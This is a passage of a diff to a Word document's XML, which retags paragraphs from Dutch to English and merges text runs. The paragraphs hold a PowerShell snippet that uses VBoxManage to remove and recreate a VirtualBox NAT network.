-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Remove</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>existing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>needed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve"># Check </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (VBoxManage.exe </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> list | Select-String -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Pattern</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+        <w:t># If it exists, remove it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6244,115 +5143,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>If</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>remove</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t xml:space="preserve">VBoxManage.exe </w:t>
@@ -6362,7 +5153,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -6371,34 +5162,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>remove</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remove --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>netname</w:t>
       </w:r>
@@ -6407,7 +5180,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
       </w:r>
@@ -6416,7 +5189,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -6427,14 +5200,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6442,35 +5215,17 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Write-Output "NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+        <w:t>Write-Output "NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -6479,96 +5234,42 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>removed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>successfully</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' removed successfully."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">} </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>else</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+        <w:t>} else {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:tab/>
@@ -6577,107 +5278,25 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>If</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>doesn't</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, print a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>message</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+        <w:t># If it doesn't exist, print a message</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6685,35 +5304,17 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">Write-Output "NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+        <w:t>Write-Output "NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -6722,60 +5323,24 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' does </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>not</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>."</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>' does not exist."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t>}</w:t>
@@ -6786,59 +5351,85 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Add</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NAT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Add NAT network with desired settings</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Write-Output "Creating NAT network '$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
